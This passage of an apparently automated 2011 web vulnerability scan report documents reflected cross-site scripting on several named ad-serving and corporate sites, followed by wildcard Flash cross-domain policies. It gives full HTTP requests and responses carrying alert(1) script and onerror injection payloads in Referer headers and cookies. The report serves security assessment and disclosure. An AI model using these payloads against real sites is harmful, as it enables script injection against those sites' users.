Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb61'-alert(1)-'ef62d92b22c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5fb61'-alert(1)-'ef62d92b22c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:50 GMT
Content-Length: 486

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://www.google.com/search%3Fhl=en%26q=5fb61'-alert(1)-'ef62d92b22c&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...

4.186. http://da.newstogram.com/hg.php [DMUserTrack cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 80608<img%20src%3da%20onerror%3dalert(1)>ced85d84f5e was submitted in the DMUserTrack cookie. This input was echoed as 80608<img src=a onerror=alert(1)>ced85d84f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C780608<img%20src%3da%20onerror%3dalert(1)>ced85d84f5e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C780608%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eced85d84f5e; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 166

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C780608<img src=a onerror=alert(1)>ced85d84f5e","ip":"173.193.214.243"}})

4.187. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload bc53c<script>alert(1)</script>7938f70db0c was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&jsref=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2F&rnd=1305203804180 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 12:36:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c
userid:
</div>
...[SNIP]...

4.188. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 297a7"><script>alert(1)</script>a42cb4459e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7"><script>alert(1)</script>a42cb4459e; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2026
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7"><script>alert(1)</script>a42cb4459e&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7">
...[SNIP]...

4.189. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d3e"><script>alert(1)</script>0bc9f2cc5ef was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9f6d3e"><script>alert(1)</script>0bc9f2cc5ef; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2030
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:23 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9f6d3e"><script>alert(1)</script>0bc9f2cc5ef&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

4.190. http://trc.taboolasyndication.com/bloomberg/trc/2/json [taboola_user_id cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /bloomberg/trc/2/json

Issue detail

The value of the taboola_user_id cookie is copied into the HTML document as plain text between tags. The payload c2917<img%20src%3da%20onerror%3dalert(1)>7feb297df63 was submitted in the taboola_user_id cookie. This input was echoed as c2917<img src=a onerror=alert(1)>7feb297df63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bloomberg/trc/2/json?publisher=bloomberg&pv=2&list-size=9&list-id=rbox-t2v&id=237&uim=horizontal-t2v&intent=s&uip=horizontal-t2v&item-id=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&item-type=text&item-url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&page-id=8b30818aaf47422a6a90e7b9a6ea55e93a6ee14a&cv=4-6-15-45512-2660204&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img%20src%3da%20onerror%3dalert(1)>7feb297df63

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:15 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id="d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63";Path=/;Expires=Fri, 11-May-12 11:39:15 GMT
Set-Cookie: taboola_session_id="v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355";Path=/bloomberg/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Set-Cookie: taboola_wv=;Path=/bloomberg/;Expires=Fri, 11-May-12 11:39:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 7365

trc_json_response =
{"trc":{"req":"46ab7eb1276e8dc36cb3699da961992a","session-id":"bb2bb5149baf45530a5e69614e17e0c0","session-data":"v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355","user-id":"d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>
...[SNIP]...

4.191. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The value of the PCUSERNAME cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af was submitted in the PCUSERNAME cookie. This input was echoed as b051f"><img src=a onerror=alert(1)>f07a5d839af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<input type="text" name="pcusername" id="pcusername" value="b051f"><img src=a onerror=alert(1)>f07a5d839af" onblur="if(this.value.length == 0){this.value='Email Address'};" onfocus="if(this.value=='Email Address'){this.value=''};" class="required email" alias="Username" style="width:94%;">
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 27 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://ad.us.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.us.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://apps.shareholder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.shareholder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.shareholder.com

Response

HTTP/1.1 200 OK
Content-Length: 96
Content-Type: text/xml
Content-Location: http://apps.shareholder.com/crossdomain.xml
Last-Modified: Tue, 23 Oct 2007 19:01:53 GMT
Accept-Ranges: bytes
ETag: "dd25e02ca715c81:caff3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:07:08 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.4. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.5. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.6. http://by.optimost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 11:03:34 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.8. http://engine.cmmeglobal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://engine.cmmeglobal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: engine.cmmeglobal.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"208-1304684854000"
Last-Modified: Fri, 06 May 2011 12:27:34 GMT
Content-Type: application/xml
Content-Length: 208
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443,8080"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain
...[SNIP]...

5.9. http://feeds.feedburner.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.feedburner.com

Response

HTTP/1.0 200 OK
Expires: Fri, 13 May 2011 10:57:47 GMT
Date: Thu, 12 May 2011 10:57:47 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.10. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 11:03:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.11. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
